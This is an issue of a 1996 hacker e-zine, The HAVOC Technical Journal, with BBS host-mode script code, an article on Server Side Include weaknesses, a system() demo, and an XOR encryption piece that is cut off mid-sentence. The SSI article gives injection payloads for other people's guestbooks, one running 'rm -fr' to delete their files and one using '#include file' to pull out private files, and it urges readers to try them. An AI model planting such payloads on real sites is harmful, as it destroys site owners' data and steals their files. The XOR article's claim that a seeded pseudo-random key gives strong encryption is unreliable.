Copy Link
Add to Bookmark
Report
The Havoc Technical Journal 06
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³The HAVOC Technical Journal ³±
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ±
±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
Vol. 1 | No.6 | December 15th, 1996 | A HAVOC Bell Systems Publication
"To protect and serve"
Happy Athiest Day! (Jan. 5th)
_____________________________________________________________________________
Inside this issue:
Whats new this issue..............................
Editorial.........................................Scud-O
The HellNet[tm] C/Source Code.....................Scud-O
SSI weaknessess...................................Scud-O
system()..........................................Scud-O
XOR Encryption....................................Psycho
Hot Boot Crash....................................|\|\cFill
Transatlantic Telephone Cable #8..................Keystroke
For your reading pleasure.........................
RTFM: The lamer Journal...........................
ROLL CALL & more!.................................
Next Month........................................
Send all mail to: thtj@juno.com
If you want to write an article for
THTJ email: FoxMuldet@worldnet.att.net
This months music supplied by: Cake, Beck, Sebado, Blood Hound Gang,
Tool, Pink Floyd and WHFS 99.1 !
Good Techno music from: sm:)e communications
What's new in this issue:
Not much, but FINALLY Psycho (the world's biggest lamer!) has written
an article! So now, for the first time, all the HBS members that
aren't MIA have written for THTJ!
-----------------------------------------------------------
How to contact us:
Check Out Our Web Site:
www.geocities.com/SiliconValley/8805/
Scud-O's e-mail : FoxMulder@worldnet.att.net
Psycho's e-mail : psycho@smart.net
|\|\cFill's email : down -- server crashed
Keystroke's email : prenzo@soho.ios.com
our Mag e-mail is : thtj@juno.com
HELLCORE's e-mail : hellcore@juno.com
---------------------------------------------------------------
HBS members now (should) have web pages up on our site. go to:
www.geocities.com/SiliconValley/8805/members.html
The HAVOC Technical Journal Site of the MONTH:
+-----------------------------------------------------------+
| theLURK3R's WebSite at: |
| http://home.earthlink.net/~rseal/ |
+-----------------------------------------------------------+
Editorial:
Well this issue has turned out pretty well. The past month has been
pretty good as well. The web site has been MAJORLY updated, we now are adding
HBS member pages, we have a links page, and AT&T finally let their users use
Netscape 2.02 (except ATT changed it and added a pain in the arse bug! I get
all this fucking gibberish and have to reload like crazy! its annoying to see
gibberish and the page you we just at... damn AT&T!)
Anyway... The 403 Forbidden club is dead. It was a gay name. But in
spirit, its not dead. HBS Chat is what we are renaming it, and it is going to
be cool. The main chat area will be split up into 3 frames, one for the chat,
one for users, one for your input. It's just like how mIRC looks. hopefully
we can have it up by the new year. It's time delayed chat, but it will reload
faster than other web chats. Psycho is the main man on this project, since he
knows a little java (and the fact that he would rather use this power for good
and not evil) he is writting it. I know a little java and I might help out a
little. So every one, give Psycho a round of applause! We would have used
CGI.. but geocities sucks and says no. (but me should be moving to either
luthor's site or L0pht soon, and they both allow CGI!)
Anyway that is all for now... now I must get on with issue 6...
----------------------------------------------
/ ---/ --/ / / | /------/ / /
/--- /-----/------/-----/ / / /
/----------/ /--------/
-of HAVOC Bell Systems-
FoxMulder@worldnet.att.net
Join the Athiest Coalition today. To protect our rights! [tm]
"A Scud - a theater ballistic missile - is one of the hardest targets.
They're big stainless steel tanks."
- Michael F. Weisbach, Boeing's airborne laser project manager
=============================================================================
The HellNet[tm] C/Script Source Code:
by Scud-O
I first started on the HellNet[tm] source code the day I got my new 28.8
modem. The US Robotics one I bought came with Quick Link Message Center.
It had a host mode that I started to play with. I first only modified the
intro text files, but then I wanted to add more. File descriptions would be
nice, so would chat. so I went to the Quick Link directory and opened up
HOSTMODE.SRP The first thing I noticed was that the script language looked
a lot like C code. Hmmm.. I thought.. after adding a couple of features that
mostly just displayed text files I started on the chat. I added a while loop
and quess what - it worked! so this IS C code. cool.
So anyway here it is, the HellNet[tm] source code. I havent worked on
it in about 3-4 months so it is kind of weak. I am now more interested in
starting an ISP or other internet stuff.( hell.net sound kind of cool don't
you think so? )
Why is it called HellNet[tm]?
Because I felt like it. AT&T has Worldnet, and since HBS
is the opposite of AT&T, we had so call it HellNet. The
[tm] comes in because Worldnet is a SM (slogan mark) and
HellNet[tm] looked cool.
Text files you need to create:
ABOUT.TXT - About your BBS
BYE.TXT - Log off screen
CALLERS.TXT - LEAVE EMPTY! caller info bbs will add
FILEZ.TXT - File Descriptions
HOSTHELP.TXT - HELP - you can leave blank, or fill in
HOSTMODE.TXT - The main menu
MSG.TXT - Bulletins
WAREZ.TXT - the Warezhouse: buy/sell/trade area maybe?
HOSTMODE.SRP -------------------------------------
int STACKSIZE = 45;
/* HAVOC Bell Systems HellNet[tm] Host Mode Script Version 0 */
/* Copyright HAVOC Bell Systems (c) 1996 ALL FIGHT F**KED! */
int BaudRate;
char FALSE = 0;
char TRUE = 1;
char CANCEL = -1;
int MAX_FILE_LEN = 144;
int HOST_TIMOUT;
char DefaultProtocol;
char CurrentDir[144];
char StartupDir[144];
char TempDir[144];
char UserName[82];
char userString[82];
char host_timeout = FALSE;
char host_continue;
char security_level;
char last_prompt;
char ASCIITransComplete[] = "\r\nASCII transfer completed.\r\n";
char ASCIITransCanceled[] = "\r\nASCII transfer completed.\r\n";
char xTransComplete[] = "\r\nXmodem transfer completed.\r\n";
char xTransCanceled[] = "\r\nXmodem transfer canceled.\r\n";
char yTransComplete[] = "\r\nYmodem transfer completed.\r\n";
char yTransCanceled[] = "\r\nYmodem transfer canceled.\r\n";
char kTransComplete[] = "\r\nKermit transfer completed.\r\n";
char kTransCanceled[] = "\r\nKermit transfer canceled.\r\n";
char zTransComplete[] = "\r\nZmodem transfer completed.\r\n";
char zTransCanceled[] = "\r\nZmodem transfer canceled.\r\n";
char xyCancelPrompt[] = "\r\nPress Ctrl-X several times to cancel.\r\n";
char thatSelection[] = "\r\nThe option you selected is not available to you.\r\n";
char accessDenied[] = "\r\nAccess denied.\r\n";
char tooLong[] = "\r\n\r\nYou took too long to respond.\r\n\r\nGoodbye!\r\n";
char invalid[] = "\r\nInvalid selection.\r\n";
char pleaseWaitProcessing[] = "\r\nPlease wait. Your request is being processed...\r\n";
char *days[] = {"Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"};
HostOut(char *str)
{
Out(str);
Echo(str);
}
ListProtocols()
{
HostOut("\r\nChoose a file transfer protocol...\r\n");
HostOut("<1> ASCII <5> Ymodem\r\n");
HostOut("<2> Xmodem <6> Ymodem-G\r\n");
HostOut("<3> Xmodem CRC <7> Kermit/SuperKermit\r\n");
HostOut("<4> Xmodem 1K <8> Zmodem\r\n");
HostOut(" <ESC> cancels transfer\r\n");
}
SelectProtocol()
{
int rv;
ListProtocols();
DefaultProtocol = 0;
PrintHostPrompt(3);
rv = GetUserInput(userString, TRUE, HOST_TIMOUT);
if (rv)
{
if ((userString[0] >= 49) && (userString[0] <= 56) && (!userString[1]))
DefaultProtocol = userString[0] - 48;
else
rv = CANCEL;
}
else
host_timeout = TRUE;
return(rv);
}
GetFileName()
{
int rv;
PrintHostPrompt(4);
rv = GetUserInput(userString, TRUE, HOST_TIMOUT);
if (rv == CANCEL)
{
return(CANCEL);
}
else if (rv == TRUE)
{
if (userString[0])
{
if ((Exists(userString)) == -1)
{
return(-2);
}
else
{
return(TRUE);
}
}
}
else
host_timeout = TRUE;
return(FALSE);
}
PutFileName()
{
int rv;
PrintHostPrompt(4);
rv = GetUserInput(userString, TRUE, HOST_TIMOUT);
if (rv == CANCEL)
{
return(CANCEL);
}
else if (rv == TRUE)
{
if (userString[0])
{
if ((Exists(userString)) == -1)
{
return(TRUE);
}
else
{
return(FALSE);
}
}
}
else
host_timeout = TRUE;
return(FALSE);
}
GetMultipleFiles(char *fileName)
{
char ret = TRUE;
if (fileName[0])
AddFile(fileName);
HostOut("\r\nSpecify multiple files, blank filename terminates list.\r\n");
while ((ret == TRUE) && !host_timeout)
{
while ((ret = GetFileName()) == -2)
HostOut("\r\nFile does not exist.\r\n");
StrCpy(userString, fileName);
if (fileName[0])
AddFile(fileName);
}
}
DownloadFiles()
{
int rv;
char fileName[MAX_FILE_LEN];
ClearList();
HostOut("\r\nFile Download");
if ((GetFileName() == TRUE) && !host_timeout)
{
StrCpy(userString, fileName);
rv = SelectProtocol();
if (rv == CANCEL)
return(CANCEL);
else if (rv == FALSE)
return(host_timeout);
if (DefaultProtocol == 1)
{
PrintHostPrompt(5);
if (GetUserInput(userString, TRUE, HOST_TIMOUT))
{
if (Upload(1, fileName))
HostOut(ASCIITransComplete);
else
HostOut(ASCIITransCanceled);
}
else
{
host_timeout = TRUE;
}
}
else if ((DefaultProtocol == 2) || (DefaultProtocol == 3))
{
HostOut("\r\nBegin your Xmodem receive now.");
HostOut(xyCancelPrompt);
Wait(2);
if (Upload(3, fileName))
HostOut(xTransComplete);
else
HostOut(xTransCanceled);
}
else if (DefaultProtocol == 4)
{
HostOut("\r\nBegin your Xmodem 1K receive now.");
HostOut(xyCancelPrompt);
if (Upload(4, fileName))
HostOut(xTransComplete);
else
HostOut(xTransCanceled);
}
else if ((DefaultProtocol == 5) || (DefaultProtocol == 6))
{
GetMultipleFiles(fileName);
if (!host_timeout)
{
if (DefaultProtocol == 5)
HostOut("\r\nBegin your Ymodem receive now.");
else
HostOut("\r\nBegin your Ymodem-G receive now.");
HostOut(xyCancelPrompt);
Wait(2);
if (Upload(5))
HostOut(yTransComplete);
else
HostOut(yTransCanceled);
}
}
else if (DefaultProtocol == 7)
{
GetMultipleFiles(fileName);
if (!host_timeout)
{
HostOut("\r\nBegin your Kermit/SuperKermit receive now.");
HostOut(xyCancelPrompt);
if (Upload(2))
HostOut(kTransComplete);
else
HostOut(kTransCanceled);
}
}
else if (DefaultProtocol == 8)
{
GetMultipleFiles(fileName);
if (!host_timeout)
{
HostOut("\r\nBegin your Zmodem receive now.");
HostOut(xyCancelPrompt);
if (Upload(7))
HostOut(zTransComplete);
else
HostOut(zTransCanceled);
}
}
}
else
HostOut("\r\nFile does not exist.\r\n");
}
ListFiles()
{
PrintHostPrompt(6);
if (GetUserInput(userString, TRUE, HOST_TIMOUT))
{
if (userString[1] == ':')
{
HostOut("\r\nCannot list files across drives.\r\n");
return;
}
if (!userString[0])
StrCpy("*.*", userString);
DisplayFiles(userString, security_level);
}
else
host_timeout = TRUE;
}
UploadFiles()
{
int file, i = 0, lines = 0, rv;
char ch, buffer[80];
Sprintf(buffer, "\r\nThere are %i000 bytes of available disk space on drive %c:\r\n", KBytesFree(CurrentDir[0]), CurrentDir[0]);
HostOut(buffer);
rv = SelectProtocol();
if (rv == CANCEL)
return(CANCEL);
else if (rv == FALSE)
return(host_timeout);
if (DefaultProtocol == 1)
{
if (PutFileName() == TRUE)
{
HostOut("\r\nStart your ASCII send now.\r\nPress Ctrl-Z when complete.\r\n");
rv = Download(1, userString);
if (rv)
HostOut(ASCIITransComplete);
else
HostOut(ASCIITransCanceled);
}
else
{
HostOut("\r\nFile already exists.\r\n");
return(CANCEL);
}
}
else if (DefaultProtocol == 2)
{
if (PutFileName() == TRUE)
{
HostOut("\r\nStart your Xmodem send now.");
HostOut(xyCancelPrompt);
Wait(2);
rv = Download(3, userString);
if (rv)
HostOut(xTransComplete);
else
HostOut(xTransCanceled);
}
else
{
HostOut("\r\nFile already exists.\r\n");
return(CANCEL);
}
}
else if (DefaultProtocol == 3)
{
if (PutFileName() == TRUE)
{
HostOut("\r\nStart your Xmodem CRC send now.");
HostOut(xyCancelPrompt);
Wait(2);
rv = Download(4, userString);
if (rv)
HostOut(xTransComplete);
else
HostOut(xTransCanceled);
}
else
{
HostOut("\r\nFile already exists.\r\n");
return(CANCEL);
}
}
else if (DefaultProtocol == 4)
{
if (PutFileName() == TRUE)
{
HostOut("\r\nStart your Xmodem 1K send now.");
HostOut(xyCancelPrompt);
Wait(2);
rv = Download(5, userString);
if (rv)
HostOut(xTransComplete);
else
HostOut(xTransCanceled);
}
else
{
HostOut("\r\nFile already exists.\r\n");
return(CANCEL);
}
}
else if (DefaultProtocol == 5)
{
HostOut("\r\nStart your Ymodem send now.");
HostOut(xyCancelPrompt);
Wait(2);
rv = Download(6);
if (rv)
HostOut(yTransComplete);
else
HostOut(yTransCanceled);
}
else if (DefaultProtocol == 6)
{
HostOut("\r\nStart your Ymodem-G send now.");
HostOut(xyCancelPrompt);
Wait(2);
rv = Download(7);
if (rv)
HostOut(yTransComplete);
else
HostOut(yTransCanceled);
}
else if (DefaultProtocol == 7)
{
HostOut("\r\nStart your Kermit/SuperKermit send now.\r\n");
rv = Download(2);
if (rv)
HostOut(kTransComplete);
else
HostOut(kTransCanceled);
}
else if (DefaultProtocol == 8)
{
HostOut("\r\nStart your Zmodem send now.\r\n");
rv = Download(8);
}
return(rv);
}
ChangeDirectory()
{
char directory[85], oldDir[85];
int i = 0, j, file;
HostOut("\r\nCurrent path is: ");
Echo(CurrentDir);
OutBuffer(CurrentDir, StrLen(CurrentDir));
HostOut("\r\n Change path to: ");
if (GetUserInput(userString, TRUE, HOST_TIMOUT))
{
if (userString[0])
{
if (SetDirectory(userString))
StrCpy(GetDirectory(), CurrentDir);
else
HostOut("\r\nCannot change to specified path.\r\n");
}
return(TRUE);
}
else
{
host_timeout = TRUE;
return(FALSE);
}
}
ChangeDrive()
{
int i = 0, j, file;
char junk[3];
HostOut("\r\nCurrent drive is: ");
Copy(CurrentDir, junk, 2);
junk[2] = 0;
HostOut(junk);
HostOut("\r\n Change drive to: ");
if (GetUserInput(userString, TRUE, HOST_TIMOUT))
{
if (userString[0])
{
if (SetDrive(userString))
StrCpy(GetDirectory(), CurrentDir);
else
HostOut("\r\nCannot change to specified drive.\r\n");
}
return(TRUE);
}
else
{
host_timeout = TRUE;
return(FALSE);
}
}
PrintHostPrompt(int prompt)
{
if (prompt)
last_prompt = prompt;
if (last_prompt == 1)
{
HostOut("\r\n<A>bout <B>illboards <C>hange Drive <D>ownload <E>arlier Callers <F>ilez <G>oodbye <H>elp <L>ist <M>ove <R>elist <T>alk <U>pload <W>arezhouse\r\n");
HostOut("Enter selection <A,B,C,D,E,F,G,H,L,M,R,T,U,W>: ");
}
else if (last_prompt == 2)
HostOut("\r\nEnter Password: ");
else if (last_prompt == 3)
HostOut("\r\nEnter Selection 1-8 or <ESC> to cancel: ");
else if (last_prompt == 4)
HostOut("\r\nFilename: ");
else if (last_prompt == 5)
HostOut("\r\nPress return to begin ASCII receive, <ESC> to cancel:\r\n");
else if (last_prompt == 6)
HostOut("\r\nEnter file search parameter (e.g. *.*). <ENTER> to search for all.\r\n->");
else if (last_prompt == 7)
HostOut("\r\nEnter Name: ");
else if (last_prompt == 8)
HostOut("\r\nAre you sure? <Y/N>: ");
else if (last_prompt == 9)
HostOut("\r\nEnter Sysop Password: ");
}
LogCall(char *UserName)
{
int hFile;
char szLogLine[80];
int year, month, day, dayofweek, hour, minute, second, hsecond;
Time(&year, &month, &day, &dayofweek, &hour, &minute, &second, &hsecond);
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "CALLERS.TXT");
hFile = Open(TempDir, 1);
Seek(hFile, 0, 2);
Sprintf(szLogLine, "%-25s %s %i:%i\r\n", UserName, days[dayofweek], hour, minute);
Write(hFile, szLogLine, StrLen(szLogLine));
Close(hFile);
}
HostMainLoop()
{
char host_online = TRUE, rightpassword = FALSE;
int start_time, i;
int year, month, day, dayofweek, hour, minute, second, hsecond;
start_time = Time(&year, &month, &day, &dayofweek, &hour, &minute, &second, &hsecond);
while ((CarrierDetect()) && (host_online))
{
PrintHostPrompt(1);
if ((i = GetUserInput(userString, TRUE, HOST_TIMOUT)) == TRUE)
{
if ((userString[0] == 'd') || (userString[0] == 'D'))
{
if (AllowDownloads())
DownloadFiles();
else
HostOut(thatSelection);
}
else if ((userString[0] == 'g') || (userString[0] == 'G'))
{
PrintHostPrompt(8);
if (GetUserInput(userString, TRUE, HOST_TIMOUT))
{
if ((userString[0] == 'y') || (userString[0] == 'Y'))
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "BYE.TXT");
if (!OutFile(TempDir))
HostOut("\r\nGoodbye lamer!\r\n");
host_online = FALSE;
}
}
else
host_timeout = TRUE;
}
else if ((userString[0] == 'h') || (userString[0] == 'H') || (userString[0] == '?'))
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "HOSTHELP.TXT");
if (!OutFile(TempDir))
HostOut("\r\nNo help available.\r\n");
}
else if ((userString[0] == 'l') || (userString[0] == 'L'))
{
ListFiles();
}
else if ((userString[0] == 'u') || (userString[0] == 'U'))
{
if (AllowUploads())
UploadFiles();
else
HostOut(thatSelection);
}
else if ((userString[0] == 'm') || (userString[0] == 'M'))
{
if (security_level > 1)
ChangeDirectory();
else
HostOut(thatSelection);
}
else if ((userString[0] == 'c') || (userString[0] == 'C'))
{
if (security_level > 1)
ChangeDrive();
else
HostOut(thatSelection);
}
/* Added by HAVOC 7/30/96 */
/* Billboard program i.e messages + mail! */
else if ((userString[0] == 'b') || (userString[0] == 'B'))
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "MSG.TXT");
if (!OutFile(TempDir))
HostOut("\r\nNo MSG available.\r\n");
}
/* Added by HAVOC 7/30/96 */
/* chat between op + usr */
/* continued work on it 9/14/96 */
else if ((userString[0] == 't') || (userString[0] == 'T'))
{
HostOut("\r\nNOTE: press the tilde key '~' to exit chat!\r\n");
for(;;)
/* while(userString[0]!= '~') */
{
userString[0]=GetUserInput();
if userString[0] == '~'
{
break;
}
else
{
continue;
}
}
}
/* Added by HAVOC 8/4/96 */
else if ((userString[0] == 'a') || (userString[0] == 'A'))
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "ABOUT.TXT");
if (!OutFile(TempDir))
HostOut("\r\nABOUT is not available now.\r\n");
}
/* Added by HAVOC 8/4/96 */
else if ((userString[0] == 'r') || (userString[0] == 'R'))
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "HOSTMODE.TXT");
if (!OutFile(TempDir))
HostOut("\r\nError! Menu is not available now.\r\n");
}
/* Added by HAVOC 8/13/96 */
else if ((userString[0] == 'f') || (userString[0] == 'F'))
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "FILEZ.TXT");
if (!OutFile(TempDir))
HostOut("\r\nError! Filez are offline!\r\n");
}
/* Added by HAVOC 8/13/96 */
else if ((userString[0] == 'w') || (userString[0] == 'W'))
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "WAREZ.TXT");
if (!OutFile(TempDir))
HostOut("\r\nError! Da Warezhouse is empty!\r\n");
}
/* Added by HAVOC 9/14/96 */
else if ((userString[0] == 'e') || (userString[0] == 'E'))
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "CALLERS.TXT");
if (!OutFile(TempDir))
HostOut("\r\nHey, we just cleaned the caller file, your caller no. 1 !\r\n");
}
else
HostOut(invalid);
}
else if (i == 0)
host_timeout = TRUE;
if (host_timeout)
{
HostOut(tooLong);
break;
}
}
}
main()
{
char ch, connect;
int i;
int nKey, FaxMgr;
host_continue = TRUE;
connect = FALSE;
HOST_TIMOUT = (HostTimeout()*60);
FaxMgr = CalledFromFaxMgr();
if (!FaxMgr)
{
if (CarrierDetect())
{
Echo("\r\nWould you like to hangup the line? <Y/N>: ");
if (!GetUserInput(userString, TRUE, HOST_TIMOUT))
{
HostOut(tooLong);
return();
}
if ((userString[0] == 'Y') || (userString[0] == 'y'))
{
Wait(2);
Hangup();
}
else if ((userString[0] == 'N') || (userString[0] == 'n'))
{
connect = TRUE;
}
}
if (!connect)
{
if (HostSpeed())
Baud(HostSpeed());
Parity('N');
Stop("1");
Data(8);
Out(HostInit());
Out("\r");
WaitFor("OK\r\n", 3);
}
}
StrCpy(GetDirectory(), StartupDir);
while (host_continue)
{
SetDrive(HostPath());
SetDirectory(HostPath());
StrCpy(GetDirectory(), CurrentDir);
if (!FaxMgr)
{
if (!connect)
{
Echo("\r\nWaiting for call...\r\n");
Echo("HAVOC Bell Systems HellNet[tm] v.0\r\n");
Echo("Press <ESC> to cancel or 'L' to logon locally: ");
}
}
else
FaxMgr = FALSE;
while ((!connect) && (host_continue))
{
nKey = GetKeyStroke();
if (nKey == -1)
{
Echo("\r\nHost mode canceled by operator\r\n");
host_continue = FALSE;
break;
}
if ((nKey == 'l') || (nKey == 'L'))
{
connect = TRUE;
SetLocalHost(TRUE);
Echo("\r\nEntering host mode locally.\r\n");
}
BaudRate = CallDetected();
if (BaudRate == -1)
{
Echo("\r\nWaiting for call...\r\n");
Echo("HAVOC Bell Systems HellNet[tm] V.0\r\n");
Echo("Press <ESC> to cancel or 'L' to logon locally: ");
}
else if (BaudRate)
{
Beep();
LogonDelay();
connect = TRUE;
}
}
if (host_continue && connect)
{
PrintHostPrompt(7);
if (!GetUserInput(UserName, TRUE, HOST_TIMOUT))
{
HostOut(tooLong);
connect = FALSE;
}
else
{
LogCall(UserName);
}
}
if (host_continue && UsePassword() && connect)
{
security_level = 0;
HostOut("\r\n");
for (i = 0; i < 4; i++)
{
PrintHostPrompt(2);
if (GetUserInput(userString, FALSE, HOST_TIMOUT))
{
if (UseMovePassword())
{
if (!StrnCmpI(userString, Password(), StrLen(Password())))
{
security_level = 2;
break;
}
}
else
{
if (!StrnCmpI(userString, Password(), StrLen(Password())))
{
security_level = 1;
break;
}
}
}
else
{
HostOut(tooLong);
connect = FALSE;
break;
}
HostOut("\r\nInvalid password, please try again.\r\n");
}
}
else
{
if (UseMovePassword())
security_level = 2;
else
security_level = 1;
}
if (host_continue && connect)
{
if (security_level)
{
StrCpy(HomePath(), TempDir);
StrCat(TempDir, "HOSTMODE.TXT");
OutFile(TempDir);
userString[0] = 0;
HostMainLoop();
}
else
HostOut(accessDenied);
}
SetLocalHost(FALSE);
if (CarrierDetect())
{
Wait(2);
Hangup();
}
connect = FALSE;
host_timeout = FALSE;
}
SetDrive(StartupDir);
SetDirectory(StartupDir);
}
END OF HOSTMODE.SRP -------------------
Now all I need to do is create all the COMM port source, the download
protocals and the HostOut and other stuff.. and then it will be a stand
alone BBS.. anyone want to help me out?
NOTE: if you don't have QuickLink e-mail me.. I might send it to you, but
i'll tell you where to get it, since we should be getting an FTP site up
in a little bit...
The full program is only about 2 megs uncompressed... it is
probably only like 800k or so compressed.
=============================================================================
SSI weaknesses by Scud-O
Server Side Includes (SSI) is a powerful feature of Web servers to
use only when a document has only a little bit of dynamic data. Using a
counter on a page that otherwise doesn't change is an example.
However as great as SSI sounds, it also has some serious security
weaknesses. Since SSI can be used to execute programs, poorly designed pages
can give out tons of info. However not every server can use SSI, and many
turn off the feature. The two most popular servers, NCSA and Netscape can use
SSI, but the CERN server can not. However their is a CGI out called
fakessi.pl that you can use to emulate SSI with. You can find fakessi.pl
at: sw.cse.bris.ac.uk/WebTools/fakessi.html .
With SSI the main security weaknessed lie in executing CGI's or other
programs. You can execute other (insecure) CGI's (like the one in Issue 4) by
doing this:
<!--#exec cgi="/cgi-bin/finger.pl"-->
Very easy! just change the text between the quotes to run whatever you want.
To execute programs:
<!--#exec cmd="/usr/ucb/finger $REMOTE_USER@$REMOTE_HOST"-->
Both of these would return the results of a finger.
A little bit o fun:
try this:
<!--#exec cmd="/bin/rm -fr"-->
and watch those files just disappear!
Okay you are saying.. well I can do this on MY page, but what about OTHER
people's pages?
Well, one example is the standard guestbooks around. Most of them
either allow you to enter HTML commands, or they are stupid and process your
comments into HTML. If that server has SSI and you use the code above, their
files will be deleted! Some guestbooks strip off SSI, but many do not. I
am not sure abouit Lpage, but I suspect that it will not work. However in
many guestbook CGI's people write, they will work. Hopefully the web page
owner will not see the guestbook and be culeless to why his files are missing!
Then if he doesn't update his guestbook, every time some one views it, HIS
FILES WILL BE DELETED AGAIN!! Oh well, have fun!
Another attack?
Say there is a REALLY juicy file some one has on their box that you
want. Another feature of SSI was ment to include files in an HTML document
can help you. Made to add boilerplates (information you want to repeat in
many of you web documents) you can use the tag:
<!--#include file="bottom.html"-->
This would include the file bottom with what ever is in the file in the
web page. (This is great for uniformity, and I indend to use it as soon as
I move to luthor's place or L0pht and have CGI access!)
Anyway, if in the guestbook for example, you type in:
<!--#include file="system1.sniff"-->
(say this file has some good sniffer info or something..)
You should, theoretically have the file outputed to the guest book, and from
thies either cut and paste or save the html file and you have the file!
=============================================================================
system() -
while trying to find a C function so that I can use DOS commands on my
school's network I found system(). At first I thought it was a non-ANSI
function, but to my surprise, once I looked in a few books and saw that
it was included in the stdlib.h header so "hey, great!" . system() is VERY
simple to use, but you must be careful with memory. Since the system() runs
from the program and the program is run from the OS, it doesn't have free run
of the memory. Or at least in DOS, UNIX might be different but I haven't been
able to test that yet. So basically if you have enough free RAM, the OS
command processor will load, otherwise you will get a nasty error message.
the basic format is:
system(command);
for example in DOS to print out the directory listing you can use either:
system("dir");
-OR-
char *command = "dir";
system(command);
Here is an example of system() :
/* system() demonstration by Scud-O of HBS */
/* For The HAVOC Technical Journal Issue 6 */
#include <stdio.h>
#include <stdlib.h>
main()
{
char input[40]; /* a buffer for input */
while(1)
{
/* First get the command */
puts("\nInput your command or hit ENTER to exit");
gets(input);
/* exit if line is blank */
if (input[0] == "\0")
exit(0);
/* otherwise execute command */
system(input);
}
}
Now isn't that simple?
If you want to run multiple command, well just use the code above, or do a
simple system("command.com") if you are using DOS.
Please note: if you are working on a program that is to be multiplatform,
don't use system() or if you do, be careful. If you use ANY special OS
commands you will have code that is much less portable.
Well, that's all folks!
=============================================================================
XOR data encryption with an infinite length key by Psycho
With the increased awareness of the necessity for privacy of electronic
information, there is a need for simple, efficient methods of data
encryption. One of the most common methods, for some time now, has been
the use of the exclusive-OR (XOR) operator on files, with some small repeating bytestream
known as the key.
When the resultant file is XORed with the key again, it reverts back to
its original state. There are many existing examples of programs that
use the XOR method to encrypt files with a key word or phrase. For many,
this level of security is more than ample; however, when the length of
the encryption key is less than that of the file to be
encrypted, there exists the possibility that the repeated key
can be deduced, and the file decrypted.
Because the key is repeated many times throughout the encryption process,
it may be possible to crack the code within a reasonable amount of time, and
thus XOR encryption with small keys is not used in high security situations.
However, if the key length is sufficiently great, to the point where it is
the equal of the data being encrypted, then XOR encryption remains uncrackable,
and is thus an easily implemented encryption method.
The only problem with using keys as large as the file or datastream you need
to encrypt is that both the key must be transferred through a secure medium,
which might be either costly or unworkable. If you want to encrypt a four
hundred megabyte database, you'll need to carry around a decoder CD-ROM with
an equally large key! Obtaining a reliable key of such a size, which cannot
be determined by other sources, may prove difficult, and is certainly not
efficient. If you deal with large files, then finding and transmitting an
extremely long key may be costly and time-consuming (particularly if the key
is changed regularly for security purposes).
There is, however, a solution! Anyone who has ever generated random
numbers upon a computer, quickly realises that the numbers are not
truly random. They must be "seeded" with particular values, which
give a particular sequence of numbers. We can use this inherent
deficiency within random number generators to construct (on-the-fly)
an infinitely large key for the purposes of encryption, by seeding it with
a particular number which users can specify. Rather than storing the key,
we only need pass on the seed value, rather than a huge code-key.
Provided the same random number generator is used (usually programming
language specific and platform specific) we can have an infinitely large
key that gives us increased protection.
Security Warning :
While this method gives greater
security that a small, self-repeating XOR encryption key, it does not guarantee
absolute protection. The method used to generate a key exploits a weakness in
the random number generators of computing languages - namely that they are
pseudo-random number generators. Since they are not truely random (and require
a seed), we can replicate the same sequence of numbers time and time again. The problem
with a pseudo-random number generator is that there may be some underlying pattern
to the numbers it generates. Unless your random number generator avoids repetition,
there exists the potential for repetition on extremely large files.
General Theory
For those who are unfamiliar with the XOR operator, it is covered in most
discrete maths / computer science textbook. For the purposes of encryption,
it has several desirable properties. Firstly, its extremely simple to use
and understand (unlike more advanced methods such as say, the RSA encryption
algorithm used in public key cryptography). We have a series of characters
known as a "key" which we use to encrypt a file or datastream. Then, we
can at a later date use the same key, and the same programming code,
with the XOR operator on the encrypted datastream. Our original data is
restored, simply by using the XOR function with the key again.</P>
The syntax for XOR encryption, under most programming languages, is
like this :
encrypted_byte = originalbyte XOR keyvalue
(where keyvalue is a byte taken from a repeating sequence of characters
which are used both to encrypt and decrypt)
Likewise, the syntax for XOR decryption, under most programming languages,
is like this :
original_byte = encrypted_byte XOR keyvalue
(where keyvalue is a byte taken from a repeating sequence of characters
which are used both to encrypt and decrypt)
For those interested in the more theoretical details, the exclusive-OR
operator is evaluated by examining individual bits, and comparing them
to the result in the following truth table.
+--------------------+
| A B | eXculsive-OR |
+-----+--------------+
| 0 0 | 0 |
+-----+--------------+
| 0 1 | 1 |
+-----+--------------+
| 1 0 | 1 |
+-----+--------------+
| 1 1 | 0 |
+-----+--------------+
As you can see, the XOR operator will return true if, and only if, the
operands are either true, or false, but not both. If A and B are false,
then XOR returns false, but if they are different, XOR returns true.
Now, to examine and understand why XOR encryption is so simple to use, take
any value for A (either 0 or 1) and apply the XOR function to a key-bit (B) of 0.
Do so again, and you will see that you arrive at your original bit (A).
Likewise with a key value of 0, a second XOR restores the original bit.
This is a handy feature, as your program need not have separate encryption and
decryption routines. Simply executing the central algorithm once, then again
can both encrypt and decrypt.
Infinite length keys
Our infinite length keys are generated simply through a random number generator
which is seeded by a user-specified value. Under most languages, the number
generated from one execution of an application will be the same when the
application is next executed, unless the generator is seeded;
usually by the system timer. But if we seed the generator
with a known value - which will generate our encryption key - at a later
date that same key can be reproduced for decryption.
Example source code
The following Turbo Pascal listing gives you a working example of the
infinite length key XOR system. Note that random number generators will
most likely be platform and language specific, so that a Turbo Pascal
compiled system probably won't work with a Visual Basic system, and vice
versa. This brings an added benefit, for to break the code, you would not
